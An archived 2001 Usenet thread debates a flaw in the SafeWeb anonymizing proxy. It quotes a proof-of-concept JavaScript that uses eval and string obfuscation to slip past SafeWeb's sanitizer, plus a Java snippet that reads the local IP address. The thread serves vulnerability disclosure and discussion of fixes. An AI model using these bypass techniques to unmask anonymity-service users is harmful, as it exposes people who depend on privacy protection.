Safeweb's site on the whitelist? This would catch all the HTTP requests to
other servers that could jeopardize your security.
Of course, non-HTTP connections aren't affected and still pose risk. Couple
this with a sort of a firewall (ZoneAlarm? Tiny Personal Firewall?) that
will guard other outgoing connections.
Could help.
Shaddack, the Mad Scientist
Dave Howe
Paul Rubin <phr-...@nightsong.com> said :
>Try visiting http://www.nightsong.com/phr/safeweb-insecure.html. That
>page contains some javascript to pop a window on www.yahoo.com, where
>the javascript is cooked to bypass Safeweb's anonymization, so your IP
>address will appear in Yahoo's logs.
javascript filter.
for those who don't want to visit the above page, here is the code
concerned:
<script>
foo = "win";
foo = foo +( "dow.o");
foo = foo +( "pen ('ht");
foo = foo +( "tp:/");
foo = foo +( "/ww");
foo = foo +( "w.yahoo.com')");
eval(
window.top.fugunet_getCleanJS(
foo, "https://www.safeweb.com/o/_o(154):_win(1):_w:
_base(http://www.nightsong.com/phr/):"));
</script>
<script language='vbscript'
src='https://www.safeweb.com/_s:fugunet_vbslib.htm'></script>
as you can see, it builds the script command
"window.open('http://www.yahoo.com')" from string segments, then uses
one of Safeweb's *own scripts* to execute it ;)
Dave Howe
(UTC)]), NOSPAMs...@type2.com (Thomas Shaddack) said :
>Combine it with access-blocking proxy, configure the proxy with a
>"whitelist" (forbid access to machines other than the listed ones), and put
>Safeweb's site on the whitelist? This would catch all the HTTP requests to
>other servers that could jeopardize your security.
that changed a hidden field on your form to read as your IP address,
then legitimately hit the "send" button thinking you were just logging
into your webmail, but were in fact confirming your real email address
to them via the safeweb interface?
Paul Rubin
> >Of course I could have made the javascript generate an image tag
> >to a 1x1 pixel invisible gif on my site, instead of to Yahoo.
> >That means I'd have gotten your IP instead of Yahoo, and no window
> >would have popped.
>
> Combine it with access-blocking proxy, configure the proxy with a
> "whitelist" (forbid access to machines other than the listed ones), and put
> Safeweb's site on the whitelist? This would catch all the HTTP requests to
> other servers that could jeopardize your security.
Yeah, you could do that, it would fix the security hole, but it means
that the page wouldn't operate properly (you wouldn't see the pop-up
window). The whole approach of anonymizing by rewriting html/js is a
big kludge. The real fix is to set up the anonymizer as a
conventional proxy server that does no html rewriting, and configure
your browser to pull everything through it. That's how lwpa.com worked
but I think it's shut down now.
Thomas Shaddack
>it would catch this one 'sploit, yes - but if you had some javascript
>that changed a hidden field on your form to read as your IP address,
>then legitimately hit the "send" button thinking you were just logging
>into your webmail, but were in fact confirming your real email address
>to them via the safeweb interface?
(Real email address, or an IP address? Say it's a typo. :) )
Yeah, *this* would be what would go through all the javascript-conserving
protections. The script is:
addr=java.net.InetAddress.getLocalHost();
host=addr.getHostName();
ip=addr.getHostAddress();
However, defense still exists; java object is a toplevel object for
accessing all the classes in the java package from within javascript.
I found this one class in the file /windows/java/packages/d7t757lf.zip
(about 5 megs),as java/net/InetAddress.class file.
One of the possibilities is to just erase the class files (if java virtual
machine is never to be used on the computer). If you want to retain java
capabilities but don't want it to access your IP, just erase or damage this
file in the package.
Other possibility, useful for selectively disabling javascript
functions/objects, is to find the relevant DLL in /windows/system/, take a
hexeditor, and subtly change the name of the property there (ie, insert a
different character; I usually use "!" to replace some character in the
identifier). This is pretty universal method to deal with language
interpreters.
CAVEAT: It can happen that your labour will be destroyed by a random update
of the system without you knowing about it. Keep a checksum of the file and
check it during each startup. Alternatively, have a copy of the file
somewhere and copy it back to its original location during each startup.
(The run-when-startup directory and relevant registry entries are your
friends.)
The direct binary editing of the DLLs is deadly effective measure to deal
with things like spyware. Usually the URLs the program has to contact (most
of spyware uses HTTP as transport protocol, it's very comfortable and
bulletproof in terms of compatibility with the installations) is stored
somewhere in the file. Find it, destroy it. Either repoint it to 127.0.0.1
or to a friendly machine where you have alternate content to receive. Or
replace it with a nonexistent address; the DNS lookup then will fail and no
request will be done.
Some adware/spyware uses a default proxy, as set in the browser. This is
what I call nice behaviour, and a filtering proxy (like my pet, Internet
Junkbuster) can deal with it. However, in some cases (like the infamous
Aureate advert.dll), the library contains its own socket code and does the
requests on its own; in such cases, you will usually find in the DLL the
HTTP headers and a GET or POST statements. Destroy them. Computers treat
such things on the principle of exact matches, so one-character difference
makes the line incomprehensible for the target machine, even if the request
will not be possible to be intercepted it will not be understood. (So no
more dancing animated GIFs!) Proven experimentally, works.
This is universally usable approach when you want to disable some functions
of the software. It is very powerful way to enforce your will. Of course,
in some jurisdictions it could be considered illegal, as it is "unlicenced
modification".
Be creative.
It's only one and zeroes! :)
Shaddack, the Mad Scientist
Dave Howe
><0lgbftkgsm798fkv8...@4ax.com>:
>
>>it would catch this one 'sploit, yes - but if you had some javascript
>>that changed a hidden field on your form to read as your IP address,
>>then legitimately hit the "send" button thinking you were just logging
>>into your webmail, but were in fact confirming your real email address
>>to them via the safeweb interface?
>(Real email address, or an IP address? Say it's a typo. :) )
with anon logins/actual mail (if you are foolish enough to use
Netscape for both email and browsing) but yes, it was a braino - I
meant IP (as you could deduce from the statement about changing a
formfield to unhide it) but was thinking "and maybe email as well" and
sorta missed out some words ;)
>Yeah, *this* would be what would go through all the javascript-conserving
>protections. The script is:
>One of the possibilities is to just erase the class files (if java virtual
>machine is never to be used on the computer). If you want to retain java
>capabilities but don't want it to access your IP, just erase or damage this
>file in the package.
Obvious replies here are that (as you noted) a random update could
replace them (and indeed, future versions of the browser may well
check the checksum for that file internally and fix it every time) and
second, that you may not be able to do so - if (for example) it is a
company or cybercafe computer, then a dim view will be taken of you
buggering about at a low level with system files.
In any case, it is a fairly techie thing to do - I could do it, as
could most of this group - but if your auntie has a computer (you
know, the one who calls you for tech support and can't launch the
internet dialup if the "The Internet" icon gets accidentally dragged
into a folder), could you trust her to do it successfully? Should you
have to? the bulk of this attack relies on two things
a) building the command as a string at runtime
b) calling Safeweb internal routines to execute the string
all that is really needed is for the Safeweb internal routine to
sanity-check the input one more time - if it gets handed an unsafe
string that it wouldn't have passed the first time though - then it
shouldn't pass it the second time. yes, this will add overheads - but
with luck they will be low.
Jon Chun
The JavaScript code on the site referenced below is indeed "cooked"
and in a form neither the author or we have ever seen real content
sites use. In fact, a company/webmaster would usually have to go to
some length to re-write all their links in such an unnatural and
difficult to maintain fashion in an futile attempt to fool SafeWeb.
To protect yourself against such potentially malicious websites simply
click on the "Configure" button in the SafeWeb toolbar and check the
"Paranoid" sanitization level.
To verify SafeWeb defeats this "cooked" JavaScript please try the
following:
1) Goto www.safeweb.com
2) Enter www.yahoo.com in the main input box and click the "Go!"
button
3) The secure SafeWeb browser window will open up with our toolbar at
the top. Click on the "Configure" button below the URL input box.
4) The Configuration window will pop-up, check the "Paranoid" box
under the Sanitization level and then click "Update Options"
5) Now enter "www.nightsong.com/phr/safeweb-insecure.html" into the
SafeWeb toolbar
You'll now see that this "cooked" malicious JavaScript code is blocked
by SafeWeb and you are protected from any invasive pop-up yahoo window
(or 1x1 gif). The "Paranoid" Sanitization Level is not a default
because such malicious websites are extremely rear while many more
real websites may use the same potentially dangerous JavaScript
command for legitimate reasons. Rather than potentially limit
functionality of these real websites we've enabled you to selectively
protect yourself against such theoretically malicious websites should
they come into existence.
Keep in mind, any website that did intentionally deploy such malicious
"cooked" JavaScript would immediately stand-out and garner negative
press for going to such extreme efforts for controversial
anti-consumer and anti-privacy objectives. In a time when even
companies like DoubleClick are backtracking on their previous privacy
violations and appointing "Chief Privacy Officers", consumer rights
groups are winning the ear of the media and even the government is
hard at work on privacy legislation you're not likely to see any
significant web property go to through such contortions and costs to
invade your privacy with such "cooked" JavaScript. If this did come
to pass, you can just block such malicious JavaScript now via our
"Paranoid" Sanitization Level or SafeWeb could automatically switch on
"Paranoid" sanitization for known offenders. In addition, SafeWeb can
simply add code to trap such "cooked" code if the situation demands it
as described below.
(NOTE: The next two paragraphs have a more technical description for
those who are interested in the details of how this "cooked"
JavaScript works and how SafeWeb defeats it. Please ignore it if
you're neither technical nor interested in such detail).
This "cooked" JavaScript works by taking advantage of what SafeWeb
calls "dangerous" JavaScript such as those commands with the ability
to create self-modifying code including the "eval" statement used
here. Such self-modifying code works by dynamically creating
additional commands that are then executed. The danger here is that
any sanitization program parsing self-modifying code will not, to a
first approximation, know what the ultimate command created by
self-modifying code is before execution making it difficult to
determine malicious intent. In addition, the eval command is executed
on the remote client PC within the web browser's embedded JavaScript
interpreter engine which SafeWeb has no view into. To catch
maliciously written self-modifying code one would have to basically
create a full JavaScript interpreter on our proxy servers and test the
execution there.
However, because JavaScript, VBScript and most other web scripting
languages are relatively straightforward and have few powerful,
potentially malicious commands we can contain the potential problems
much more simply. The simplest solution is to selectively block these
few commands which could potentially be misused which is what
"Paranoid" Sanitization does in SafeWeb. Most websites do not depend
upon these few JavaScript commands so most web surfing is unaffected.
Should websites begin to commonly deploy such malicious JavaScript
(very unlikely), SafeWeb can further address this issue by extending
our JavaScript sanitizer to only pass through self-modifying commands
we can resolve and certify to be secure. This would leave the vast
majority of the rich websites secure and functional via SafeWeb.
(NOTE: End of Technical jargon)
The overriding design goals of SafeWeb are to be "easy to use" and
"effective". SafeWeb was founded because there was (and still is) no
other security technology meeting both of these goals. There are very
effective solutions like "PGP", "SSH", "Citrix Metaframe" and
"Freedom" to solve various security and privacy issues but all are too
complex and expensive for the vast majority of users who are
non-technical which explains why none of them can be considered a
standard for Internet privacy. We decided early on that this market
for complex security applications was crowded with good products. In
addition, most download applications such as Alexa, Freedom, Brodia,
etc (although useful) have been marketplace failures, massively
unprofitable, of questionable longivity, and do not meet the general
needs of 95% of Internet users who even struggle with AOL. In
addition, download applications have tremendous problems with cross
platform programming, support and costs as well as incompatibilities
with other applications, operating systems and even ISPs like AOL.
Finally, download applications do not work on managed networks like
corporate LANs or behind restrictive government firewalls where
privacy and security are most in need. However, if a particular user
does have the money, time, expertise and no technical
incompatibilities/restrictions that allow these applications to be
used they are effective no doubt.
To be easy to use SafeWeb had to be a web-based security solution
anyone could use anywhere, anytime without downloads, configuration,
registration, login, etc. In looking at the many web-based privacy
proxies we realized that none were really effective. Before SafeWeb
became the world's largest privacy proxy shortly after our launch, the
oldest and previously largest web-based security solution did then and
still: (1) sends all web content unencrypted over the public Internet
(paid and free version - SSH tunneling very costly, complicated,
impractical and not a pure web solution), (2) can only sanitize simple
static HTML breaking millions of rich websites like sony, mtv,
hotmail, etrade and webvan (all versions), (3) partners with invasive
advertisers like flycast, (4) can easily be blocked by firewalls and
censorware (all version) and (5) blocks you from viewing many websites
(free version).
SafeWeb has solved all these shortcomings common among the "easy to
use" web-based privacy solutions in order to create an "effective"
security solution. In addition, with TriangleBoy SafeWeb is the only
privacy service of any kind that cannot be blocked via traditional
firewalls and other censorware. Within a few months from launch
SafeWeb has quickly grown to be the world's largest online browsing
privacy service mostly via a few good press articles, word of mouth
and users voting with their browsers.
Although no security technology is immune from such issues, we have
not discovered nor had any actual security holes reported to us. To
date, all such reports of potential security holes have turned out to
be from users who do not know of all functionality of SafeWeb which
we often embed behind the "Configure" button to protect non-technical
users from overload. We are not overly arrogant or naive to think
that such security holes will not eventually be discovered and always
listen and respond in quickly to all such feedback like this one. If
you do find what you think is a security hole or have other issues or
comments regarding SafeWeb/TraingleBoy please contact us at
feed...@safeweb.com.
Regards,
Jon Chun
President & Co-founder
SafeWeb
On 06 May 2001 00:09:28 -0700, Paul Rubin <phr-...@nightsong.com>
wrote:
>Dave Howe <Spam.B...@bigfoot.com> writes:
Free-man
wrote:
>Capit...@Freedom.org (Free-man) writes:
>> >Javascript yes, Java no.
>>
>> Hello Paul -- You seem to know what you are talking about but
>> I will include the relevant parts of the FAQ anyway. And it still
>> doesn't work for me. :(
>
>What exactly did you do and what browser are you using?
My browser is Opera with scripting languages enabled.
I go to the Safeweb site and type in a URL such as
http://www.fff.org or www.fff.org and get a popup box
saying "illegal address"
On the page where I type the URL , there is a message, "We can not
guarantee that your version of Netscape is supported by Safeweb.
We recommend that you use Netscape versions later than 4.02 excluding
6.x releases."
So maybe Safeweb does not like Opera.
Dave Howe
GMT]), safe...@pacbell.net (Jon Chun) said :
Interesting - welcome to the group(s) Jon - I hope you hang around a
while so we can ask you things about safeweb ;)
>FYI,
>The JavaScript code on the site referenced below is indeed "cooked"
>and in a form neither the author or we have ever seen real content
>sites use. In fact, a company/webmaster would usually have to go to
>some length to re-write all their links in such an unnatural and
>difficult to maintain fashion in an futile attempt to fool SafeWeb.
I hate to point out that the webmaster might not even know - it could
be a webbanner include, from a doubleclick-style site.
>To protect yourself against such potentially malicious websites simply
>click on the "Configure" button in the SafeWeb toolbar and check the
>"Paranoid" sanitization level.
which seems to work, yes - but unfortunately at the expense of some of
the other javascript-using sites I tried. I assume that is why it
isn't the default.
>You'll now see that this "cooked" malicious JavaScript code is blocked
>by SafeWeb and you are protected from any invasive pop-up yahoo window
>(or 1x1 gif). The "Paranoid" Sanitization Level is not a default
>because such malicious websites are extremely rear while many more
>real websites may use the same potentially dangerous JavaScript
>command for legitimate reasons. Rather than potentially limit
>functionality of these real websites we've enabled you to selectively
>protect yourself against such theoretically malicious websites should
>they come into existence.
the problem then becomes identifying such sites.
Let us take a scenario using only the displayed functionality - a
DoubleClick style advertising company decides it desparately needs
marketing info on those who are safewebbing; to this end, it arranges
for the free web hosts to be requesting an entire html page from their
server (or SSI requesting a subset of html), rather than just a
graphic. on selected days then, it checks the inbound request, and for
sites that are in the Safeweb IP range, returns a cooked page that
opens one of the usual annoying popups, frameless and without any
controls other than the close. so many geocities-style sites use them,
users just close them automatically without even really looking at
them - but in this case, they have stepped outside of the nice safe
Safeweb sandbox. Provided the terms & conditions of the hosting
service permit it (a generic "hosting services xxx is funded entirely
by advertising revenue; while we do not track visitor IP addresses in
any way, we cannot guarantee that our advertisers do not;" followed by
and buried in enough of the usual "withdraw a site at any time" and
"illegal content not permitted" clauses that few people ever read will
give the host something to point and and wash their hands of the
situation) they will say they are exchanging webspace and bandwidth
for advertising "eyeballs" in an increasingly poor-paying market, and
are surprised/upset about this and will take it up with the company
immediately....
>Keep in mind, any website that did intentionally deploy such malicious
>"cooked" JavaScript would immediately stand-out and garner negative
>press for going to such extreme efforts for controversial
>anti-consumer and anti-privacy objectives.
no more than they would for gathering such info anyhow - if they feel
no guilt over grabbing and correlating such info in the first place,
then they are unlikely to feel added guilt over bypassing any
lockdowns the user may have put in place.
>In a time when even
>companies like DoubleClick are backtracking on their previous privacy
>violations and appointing "Chief Privacy Officers", consumer rights
>groups are winning the ear of the media and even the government is
>hard at work on privacy legislation you're not likely to see any
>significant web property go to through such contortions and costs to
>invade your privacy with such "cooked" JavaScript. If this did come
>to pass, you can just block such malicious JavaScript now via our
>"Paranoid" Sanitization Level or SafeWeb could automatically switch on
>"Paranoid" sanitization for known offenders.
It would almost have to be automatic - members of these groups are the
converted as far as privacy goes, but the average joe-on-the-street
will just assume Safeweb is transparently doing what it says it is -
sanatizing attempts to track him.
>In addition, SafeWeb can
>simply add code to trap such "cooked" code if the situation demands it
>as described below.
<snip>
I must admit to not having learned JS to this depth - is it really so
difficult to rewrite Eval(string) as Eval(Safeweb.checksafe(string))?
(note this not valid syntax, and I know it - it is just to give feel
for the required process) or would that be too slow for most uses? I
have the feeling it would be (imagining a site calculating a clock
with eval *shudder*)
how about a java library? could you call a local java app to
sanity-check strings for you? even if this only caught events after
the fact (got a copy of the string after it had been passed to eval,
and popped up a "oops, site has done $NAUGHTYTHING; click here of if
you wish to inform Safeweb of the following information:
website url
string"
>The overriding design goals of SafeWeb are to be "easy to use" and
>"effective". SafeWeb was founded because there was (and still is) no
>other security technology meeting both of these goals. There are very
>effective solutions like "PGP", "SSH",
both of which are really only packet-based - ok for email or terminal
sessions, but not really much use to the average user.
I could see a use for a VPN tunnel to a web proxy that doesn't pass on
user IP, but as you point out, this requires a lot of client-side code
to be running.
>"Citrix Metaframe"
not really a security tool - but useful for remote dialin to a LAN.
>and "Freedom"
heard good things about it - but yes, requires client-side installs
and accounts and so forth.
> In
>addition, download applications have tremendous problems with cross
>platform programming, support and costs as well as incompatibilities
>with other applications, operating systems and even ISPs like AOL.
Hmm. Safeweb works well in IE and Netscape........
<snip advertising copy>
yes, Safeweb is vastly better than Anonymiser, and for free we are
probably looking a gift horse in the mouth - but unfortunately, by
establishing a expectation of "for dummies" online security, you may
be risking getting users to drop protection they might otherwise have
used
(taking an extreme example; someone living in a repressive country
might be posting info on people the local troops are looking for to an
online site so they know to dig a hole and pull it in after them until
they stop looking; the local governor decides finding out who this is
is a high priority (especially now he seems to be posting directly to
the board, rather than sending the data to a online confederate in
america who then posted it up to a day later) so they hire a hacker
who breaks into the site - finding safeweb accesses he can't trace.
but hey, here is this handy 'sploit he knows - so he arranges for the
upload page (only) to trace the IP of whoever uploads the next file to
that area.....)
Yes, it's an extreme example, and the user should not have been so
foolish as to rely on Safeweb alone if his life depended on it (or to
at least investigate the settings and set them to "paranoia" every
time) - but he could well believe that the extra day of advanced
warning would save more lives than he was risking.
>Although no security technology is immune from such issues, we have
>not discovered nor had any actual security holes ....<snip>
we have. Ok, we have not found a *live* site using this, but a hole is
a hole - the usual theme for Bugtraq posts is that it is better to fix
the hole in advance than risk a blackhat exploiting the hole for
months before anyone notices. In the same theme, it would have been
better for Safeweb to have been notified directly rather than told
this conversation was happening - Bugtraq posts are usually condemned
by the list members if they don't say the authors were notified, and
given at least a week to respond (note not fix - just acknowledge the
problem and give an estimate of the time it will take to fix) but the
fact still remains - if a route exists to bypass the protection of a
program, then you do not need to find examples of it "in the wild"
before you look into patching it. I would argue that "safe unless the
webmaster wants to make a real effort to get your data" is not safe
enough.
I am sorry if this is a bit unformatted - but it is after 2am here,
and I am going to bed now ;)
Free-man
wrote:
>SafeWeb has solved all these shortcomings common among the "easy to
>use" web-based privacy solutions in order to create an "effective"
>security solution. In addition, with TriangleBoy SafeWeb is the only
>privacy service of any kind that cannot be blocked via traditional
>firewalls and other censorware. Within a few months from launch
>SafeWeb has quickly grown to be the world's largest online browsing
>privacy service mostly via a few good press articles, word of mouth
>and users voting with their browsers.
>
>Although no security technology is immune from such issues, we have
>not discovered nor had any actual security holes reported to us. To
>date, all such reports of potential security holes have turned out to
>be from users who do not know of all functionality of SafeWeb which
>we often embed behind the "Configure" button to protect non-technical
>users from overload. We are not overly arrogant or naive to think
>that such security holes will not eventually be discovered and always
>listen and respond in quickly to all such feedback like this one. If
>you do find what you think is a security hole or have other issues or
>comments regarding SafeWeb/TraingleBoy please contact us at
>feed...@safeweb.com.
Hello Jon
FYI, Safeweb does not work with Opera, the best browser on the market.
Thomas Shaddack
<snip>
>I must admit to not having learned JS to this depth - is it really so
>difficult to rewrite Eval(string) as Eval(Safeweb.checksafe(string))?
>(note this not valid syntax, and I know it - it is just to give feel
>for the required process) or would that be too slow for most uses? I
>have the feeling it would be (imagining a site calculating a clock
>with eval *shudder*)
>how about a java library? could you call a local java app to
>sanity-check strings for you? even if this only caught events after
>the fact (got a copy of the string after it had been passed to eval,
>and popped up a "oops, site has done $NAUGHTYTHING; click here of if
>you wish to inform Safeweb of the following information:
>website url
>string"
Not necessary, not necessary!
It's possible to re-set eval() function pointer to another function that
gets executed instead each time eval() is called.
Example:
<script language=javascript>
eval=alert;
eval("document.write('This is a test');");
</script>
Try this and you will see what I mean. I just tried it (MSIE5) and it
works. :)
Disclaimer: I am not familiar with SafeWeb's javascript libraries so I
don't know what functions are available and what further "magic" is
possible.
The implementation could look this way:
function safeeval(s)
{randomstringeval(Safeweb.checksafe(string));}
randomstringeval=eval; //Prevent recursion
eval=safeeval;
The "randomstring" part would have to be replaced by a random sequence of
characters, unique for each page served; this will prevent eventual attack
via direct call of original renamed unsecured eval().
This script has to be placed at the very beginning of the page; I suppose
this part is trivial for SafeWeb's processing scripts.
Voila, eval() hole is closed :)
Calling for peer review; if I am wrong in anything, please correct me.
Shaddack, the Mad Scientist
Thomas J. Boschloo
> It's possible to re-set eval() function pointer to another function that
> gets executed instead each time eval() is called.
Sounds clever!
But how about an SSL page? I don't think Safeweb will be able to filter
SSL protected pages (or otherwise the whole SSL business of keeping your
credit card info confidential is screwed). It just seems to me that
there remain holes as long as you don't trade it all in for a
client-side solution like ZKS/Freedom.
Not sure about all this however, just guessing,
Thomas
--
"Software patents harm the flow of free information"